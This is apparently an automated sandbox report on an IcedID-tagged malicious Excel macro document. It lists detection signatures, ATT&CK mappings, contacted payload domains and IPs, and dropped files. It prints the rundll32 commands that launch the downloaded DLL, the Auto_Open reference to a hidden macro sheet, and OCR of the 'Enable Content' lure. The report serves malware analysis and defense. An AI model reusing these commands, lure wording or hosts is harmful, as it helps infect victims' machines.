Analysis Report statistic-207394368.xlsm

Overview

General Information

Sample Name: statistic-207394368.xlsm
Analysis ID: 403864
MD5: cd5e9899a7fa08e45309f4cf728bedf5
SHA1: a8671b54099e2d201660d220fc5652d3576bd5e6
SHA256: 0465986113ca6df44638d99a67706662f7336e90c00d981666ba22217cefcfb5
Tags: IcedID, xlsm

Detection

Hidden Macro 4.0
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: System File Execution Location Anomaly
Yara detected MalDoc1
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 2932 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 1908 cmdline: rundll32 ..\jordji.nbvt1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1148 cmdline: rundll32 ..\jordji.nbvt11,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
sharedStrings.xml | JoeSecurity_MalDoc_1 | Yara detected MalDoc_1 | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2932, ProcessCommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, ProcessId: 1908
Sigma detected: System File Execution Location Anomaly
Source: Process started | Author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community | Data: Command: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2932, ProcessCommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, ProcessId: 1908

    Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: statistic-207394368.xlsm | Metadefender: Detection: 18%
Source: statistic-207394368.xlsm | ReversingLabs: Detection: 34%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 192.254.233.89:443 -> 192.168.2.6:49694 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 192.185.5.2:443 -> 192.168.2.6:49697 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Section loaded: \KnownDlls32\WININET.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\rundll32.exe
Source: global traffic | DNS query: name: industrialarttextile.com
Source: global traffic | TCP traffic: 192.168.2.6:49694 -> 192.254.233.89:443

Networking:

Yara detected MalDoc1
Source: Yara match | File source: sharedStrings.xml, type: SAMPLE
Source: Joe Sandbox View | IP Address: 192.185.5.2
Source: Joe Sandbox View | IP Address: 192.254.233.89
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS traffic detected: queries for: industrialarttextile.com
Source: jordji.nbvt11.0.dr | String found in binary or memory: http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown | Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown | Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown | HTTPS traffic detected: 192.254.233.89:443 -> 192.168.2.6:49694 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 192.185.5.2:443 -> 192.168.2.6:49697 version: TLS 1.2

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable Editing ,please g ere was a ro cm s artlng .Nordji.nbvt11 from the yellow bar above / ,
Source: Screenshot number: 8 | Screenshot OCR: Enable Editing from the yellow bar above i Once You have Enable Editing , please click Enable Co
Source: Screenshot number: 8 | Screenshot OCR: Enable Content i from the yellow bar above 0 ) WHY I CANNOT OPEN THIS DOCUMENT? I i I W You ar
Source: Document image extraction number: 7 | Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 7 | Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 17 | Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Document image extraction number: 17 | Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
Found Excel 4.0 Macro with suspicious formulas
Source: statistic-207394368.xlsm | Initial sample: EXEC
Source: statistic-207394368.xlsm | Initial sample: CALL
Found abnormal large hidden Excel 4.0 Macro sheet
Source: statistic-207394368.xlsm | Initial sample: Sheet size: 22188
Source: workbook.xml | Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="5" lowestEdited="6" rupBuild="9303"/><workbookPr filterPrivacy="1"/><bookViews><workbookView xWindow="8595" yWindow="0" windowWidth="4020" windowHeight="3120"/></bookViews><sheets><sheet name="Sheet1" sheetId="9" r:id="rId1"/><sheet name="Sheet2" sheetId="4" r:id="rId2"/><sheet name="Sheet3" sheetId="7" r:id="rId3"/><sheet name="Sheet4" sheetId="8" r:id="rId4"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet2!$AO$115</definedName></definedNames><calcPr calcId="145621"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
Source: classification engine | Classification label: mal84.troj.expl.evad.winXLSM@5/12@2/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\Desktop\~$statistic-207394368.xlsm
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{C074BD0F-C856-44A0-9DC0-75FD501B48C8} - OProcSessId.dat
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
Source: statistic-207394368.xlsm | Metadefender: Detection: 18%
Source: statistic-207394368.xlsm | ReversingLabs: Detection: 34%
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt11,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: statistic-207394368.xlsm | Initial sample: OLE zip file path = xl/media/image4.png
Source: statistic-207394368.xlsm | Initial sample: OLE zip file path = xl/media/image2.png
Source: statistic-207394368.xlsm | Initial sample: OLE zip file path = xl/media/image1.png
Source: statistic-207394368.xlsm | Initial sample: OLE zip file path = xl/media/image3.png
Source: statistic-207394368.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: statistic-207394368.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: rundll32.exe, 00000001.00000002.379945627.00000000047D0000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.373921236.0000000002D70000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000001.00000002.379945627.00000000047D0000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.373921236.0000000002D70000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000001.00000002.379945627.00000000047D0000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.373921236.0000000002D70000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000001.00000002.379945627.00000000047D0000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.373921236.0000000002D70000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting21 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | System Information Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings

    Behavior Graph


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
statistic-207394368.xlsm | 6% | Virustotal |
statistic-207394368.xlsm | 21% | Metadefender |
statistic-207394368.xlsm | 34% | ReversingLabs | Document-Office.Downloader.EncDoc

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

Source | Detection | Scanner | Label
anaheimdermatologists.com | 3% | Virustotal |
industrialarttextile.com | 0% | Virustotal |

    URLs

    No Antivirus matches

    Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
anaheimdermatologists.com | 192.185.5.2 | true | false | | unknown
industrialarttextile.com | 192.254.233.89 | true | false | | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4 | jordji.nbvt11.0.dr | false | | high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.185.5.2 | anaheimdermatologists.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false
192.254.233.89 | industrialarttextile.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 403864
Start date: 04.05.2021
Start time: 13:29:27
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 22s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: statistic-207394368.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal84.troj.expl.evad.winXLSM@5/12@2/2
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer

      Simulations

      Behavior and APIs

      No simulations

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection
192.185.5.2 | statistic-2072807337.xlsm | malicious
192.185.5.2 | statistic-207394368.xlsm | malicious
192.185.5.2 | catalog-1521295750.xlsm | malicious
192.185.5.2 | catalog-1521295750.xlsm | malicious
192.185.5.2 | statistic-1048881972.xlsm | malicious
192.185.5.2 | statistic-1048881972.xlsm | malicious
192.185.5.2 | f.xlsm | malicious
192.185.5.2 | f.xlsm | malicious
192.185.5.2 | statistic-118970052.xlsm | malicious
192.185.5.2 | statistic-118970052.xlsm | malicious
192.185.5.2 | 14e9289c_by_Libranalysis.xlsx | malicious
192.185.5.2 | 14e9289c_by_Libranalysis.xlsx | malicious
192.185.5.2 | diagram-1732659868.xlsm | malicious
192.185.5.2 | diagram-1732659868.xlsm | malicious
192.185.5.2 | diagram-1732659868.xlsm | malicious
192.185.5.2 | diagram-1732659868.xlsm | malicious
192.185.5.2 | diagram-136896931.xlsm | malicious
192.185.5.2 | diagram-136896931.xlsm | malicious
192.185.5.2 | diagram-993959417.xlsm | malicious
192.185.5.2 | diagram-993959417.xlsm | malicious
192.254.233.89 | statistic-2072807337.xlsm | malicious
192.254.233.89 | statistic-207394368.xlsm | malicious
192.254.233.89 | statistic-1048881972.xlsm | malicious
192.254.233.89 | statistic-1048881972.xlsm | malicious
192.254.233.89 | statistic-118970052.xlsm | malicious
192.254.233.89 | statistic-118970052.xlsm | malicious
192.254.233.89 | 14e9289c_by_Libranalysis.xlsx | malicious
192.254.233.89 | 14e9289c_by_Libranalysis.xlsx | malicious

Domains

Match | Associated Sample Name / URL | Detection | Context
industrialarttextile.com | statistic-2072807337.xlsm | malicious | 192.254.233.89
industrialarttextile.com | statistic-207394368.xlsm | malicious | 192.254.233.89
industrialarttextile.com | statistic-1048881972.xlsm | malicious | 192.254.233.89
industrialarttextile.com | statistic-1048881972.xlsm | malicious | 192.254.233.89
industrialarttextile.com | statistic-118970052.xlsm | malicious | 192.254.233.89
industrialarttextile.com | statistic-118970052.xlsm | malicious | 192.254.233.89
industrialarttextile.com | 14e9289c_by_Libranalysis.xlsx | malicious | 192.254.233.89
industrialarttextile.com | 14e9289c_by_Libranalysis.xlsx | malicious | 192.254.233.89
anaheimdermatologists.com | statistic-2072807337.xlsm | malicious | 192.185.5.2
anaheimdermatologists.com | statistic-207394368.xlsm | malicious | 192.185.5.2
anaheimdermatologists.com | statistic-1048881972.xlsm | malicious | 192.185.5.2
anaheimdermatologists.com | statistic-1048881972.xlsm | malicious | 192.185.5.2
anaheimdermatologists.com | statistic-118970052.xlsm | malicious | 192.185.5.2
anaheimdermatologists.com | statistic-118970052.xlsm | malicious | 192.185.5.2
anaheimdermatologists.com | 14e9289c_by_Libranalysis.xlsx | malicious | 192.185.5.2
anaheimdermatologists.com | 14e9289c_by_Libranalysis.xlsx | malicious | 192.185.5.2

                                                              ASN

                                                              Match                Associated Sample Name / URL         Detection    Context
                                                              UNIFIEDLAYER-AS-1US
                                                                  statistic-2072807337.xlsm            malicious    192.254.233.89
                                                                  statistic-207394368.xlsm             malicious    192.254.233.89
                                                                  presentation.jar                     malicious    50.87.249.219
                                                                  presentation.jar                     malicious    50.87.249.219
                                                                  GK58.vbs                             malicious    192.185.21.136
                                                                  catalog-1521295750.xlsm              malicious    192.185.20.98
                                                                  catalog-1521295750.xlsm              malicious    192.185.20.98
                                                                  4GGwmv0AJm.exe                       malicious    50.87.166.59
                                                                  c647b2da_by_Libranalysis.exe         malicious    108.179.242.122
                                                                  c647b2da_by_Libranalysis.exe         malicious    108.179.242.122
                                                                  6613n246zm543w.xlsb                  malicious    162.241.24.47
                                                                  DEMARG MALAYHCU21345.exe             malicious    162.241.169.22
                                                                  generated check 662732.xlsm          malicious    192.185.177.61
                                                                  4Y2I7k0.xlsb                         malicious    162.241.24.47
                                                                  QUOTATION REQUEST.exe                malicious    192.185.131.134
                                                                  gunzipped.exe                        malicious    192.254.189.182
                                                                  Purchase Order #DH0124 REF#SCAN005452 EXW HMM SO#UKL080947 - FD210268-001.xlsx.exe    malicious    162.144.13.239
                                                                  0145d964_by_Libranalysis.exe         malicious    162.241.169.22
                                                                  HXxk3mzZeW.exe                       malicious    192.185.140.111
                                                                  HCU213DES.doc                        malicious    162.241.169.22

                                                              JA3 Fingerprints

                                                              Match                               Associated Sample Name / URL                                          Detection    Context
                                                              37f463bf4616ecd445d4a1937da06e19
                                                                  f97e137e_by_Libranalysis.exe                                          malicious    192.185.5.2, 192.254.233.89
                                                                  e1df57de_by_Libranalysis.xls                                          malicious    192.185.5.2, 192.254.233.89
                                                                  MV RED SEA.docx                                                       malicious    192.185.5.2, 192.254.233.89
                                                                  MyUY1HeWNL.exe                                                        malicious    192.185.5.2, 192.254.233.89
                                                                  IMG-WA7905432.exe                                                     malicious    192.185.5.2, 192.254.233.89
                                                                  catalog-1521295750.xlsm                                               malicious    192.185.5.2, 192.254.233.89
                                                                  Documents_111651917_375818984.xls                                     malicious    192.185.5.2, 192.254.233.89
                                                                  Remittance Advice pdf.exe                                             malicious    192.185.5.2, 192.254.233.89
                                                                  #U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htm       malicious    192.185.5.2, 192.254.233.89
                                                                  Documents_95326461_1831689059.xls                                     malicious    192.185.5.2, 192.254.233.89
                                                                  Tree Top.html                                                         malicious    192.185.5.2, 192.254.233.89
                                                                  PT6-1152.doc                                                          malicious    192.185.5.2, 192.254.233.89
                                                                  s.dll                                                                 malicious    192.185.5.2, 192.254.233.89
                                                                  setup-lightshot.exe                                                   malicious    192.185.5.2, 192.254.233.89
                                                                  s.dll                                                                 malicious    192.185.5.2, 192.254.233.89
                                                                  8a793b14_by_Libranalysis.exe                                          malicious    192.185.5.2, 192.254.233.89
                                                                  pic05678063.exe                                                       malicious    192.185.5.2, 192.254.233.89
                                                                  6de2089f_by_Libranalysis.exe                                          malicious    192.185.5.2, 192.254.233.89
                                                                  e17486cd_by_Libranalysis.exe                                          malicious    192.185.5.2, 192.254.233.89
                                                                  Almadeena-Bakery-005445536555665445.scr.exe                           malicious    192.185.5.2, 192.254.233.89

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\44CD6028.png
                                                              Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type: PNG image data, 485 x 185, 8-bit/color RGB, non-interlaced
                                                              Category: dropped
                                                              Size (bytes): 34787
                                                              Entropy (8bit): 7.9883689087667955
                                                              Encrypted: false
                                                              SSDEEP: 768:XbyxVN2hP86XpVBxUmtCQHcQpKvtcFM/MoJ97bk3Ueu:m92hjPcQpWUot9Eg
                                                              MD5: 2C5A59B7F30E5E41412EC22FDEA1DBB5
                                                              SHA1: 9A64FB6A68683EEC580A881725DBD146E80D06B1
                                                              SHA-256: E872E66F60AE5651AE96A2C2A88D07B0D1C96CDDD45F787AB04237891AD4E8FB
                                                              SHA-512: 2D494F44E1DA36794C3E707BF1173EE63E2CF3101E3B5EA60D71A194DA9A6A1EB6B9C166B7C1ACAA2D455B9C6413D0FEE40AD38972C076183EF167818D7E92EC
                                                              Malicious: false
                                                              Reputation: moderate, very likely benign file
                                                              Preview: (binary PNG data, not shown)
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5F386603.png
                                                              Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type: PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                              Category: dropped
                                                              Size (bytes): 8301
                                                              Entropy (8bit): 7.970711494690041
                                                              Encrypted: false
                                                              SSDEEP: 192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                              MD5: D8574C9CC4123EF67C8B600850BE52EE
                                                              SHA1: 5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                              SHA-256: ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                              SHA-512: 20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                              Malicious: false
                                                              Reputation: moderate, very likely benign file
                                                              Preview: (binary PNG data, not shown)
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\B6A5D209.png
                                                              Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type: PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                              Category: dropped
                                                              Size (bytes): 557
                                                              Entropy (8bit): 7.343009301479381
                                                              Encrypted: false
                                                              SSDEEP: 12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                              MD5: A516B6CB784827C6BDE58BC9D341C1BD
                                                              SHA1: 9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                              SHA-256: EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                              SHA-512: C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                              Malicious: false
                                                              Reputation: moderate, very likely benign file
                                                              Preview: (binary PNG data, not shown)
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\DAFC4076.png
                                                              Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type: PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                              Category: dropped
                                                              Size (bytes): 848
                                                              Entropy (8bit): 7.595467031611744
                                                              Encrypted: false
                                                              SSDEEP: 24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                              MD5: 02DB1068B56D3FD907241C2F3240F849
                                                              SHA1: 58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                              SHA-256: D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                              SHA-512: 9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                              Malicious: false
                                                              Reputation: moderate, very likely benign file
                                                              Preview: (binary PNG data, not shown)
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\suspendedpage[1].htm
                                                              Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type: HTML document, ASCII text
                                                              Category: downloaded
                                                              Size (bytes): 494
                                                              Entropy (8bit): 4.962239405540505
                                                              Encrypted: false
                                                              SSDEEP: 12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
                                                              MD5: 0357AA49EA850B11B99D09A2479C321B
                                                              SHA1: 41472BA5C40F61FA1C77C42CF06248F13B8785F0
                                                              SHA-256: 0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
                                                              SHA-512: A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
                                                              Malicious: false
                                                              Reputation: moderate, very likely benign file
                                                              IE Cache URL: https://anaheimdermatologists.com/cgi-sys/suspendedpage.cgi
                                                              Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.
                                                              C:\Users\user\AppData\Local\Temp\32820000
                                                              Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type: data
                                                              Category: dropped
                                                              Size (bytes): 107618
                                                              Entropy (8bit): 7.91601370112133
                                                              Encrypted: false
                                                              SSDEEP: 1536:nmHTqPyl/yBO992hjPcQpWUot9ErjPX44sh0x13TQfDm:nl+yo9opH8x+3xs6ZQy
                                                              MD5: D297DF8319BBE1CBA66C1227F53BCDB1
                                                              SHA1: 8B8B1C4ED555046028FACCB7BDD7F124A2B7FE5C
                                                              SHA-256: 8BA1379D469ACF3184BABC90FC9C952C1B178E0EE9E470D5D1CE162D91DFF7FC
                                                              SHA-512: 1595A1C66DFC5EB37017AA9A39FA234FD851EDF20121B84EEB5E85958AE58EED893814884768035FFF83C377A587F18647D4A4982E95803E6CA5670059D46E15
                                                              Malicious: false
                                                              Reputation: low
                                                              Preview: (binary data, not shown)
                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                              Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 18:52:18 2019, mtime=Tue May 4 19:30:31 2021, atime=Tue May 4 19:30:31 2021, length=16384, window=hide
                                                              Category: dropped
                                                              Size (bytes): 917
                                                              Entropy (8bit): 4.678301446154264
                                                              Encrypted: false
                                                              SSDEEP: 12:8SPAc20U7cWCHoTY2ya8OuyF+WMjA+N/E2ybD86wpIeYIe8k44t2Y+xIBjKZm:8E+nY20AS8HD7wz7aB6m
                                                              MD5: 15D744E452A0B049024E4291FFDCD06D
                                                              SHA1: A338BBEDBE2A5D8041DE306520AD406E972C1671
                                                              SHA-256: 3700430035A5B103A7AEB6669AB99C5EF322CF67917EBE328CE4DB059A6FB233
                                                              SHA-512: 4EC7444D0759CCCC50B9DBD74E226473D09F71C95B4D5BD8684DE085884C2ECD377DB6BC939180019CF0069D5146863A8E747E13E2A7E736751AC13665A71948
                                                              Malicious: false
                                                              Preview: (binary shortcut data, not shown)
                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
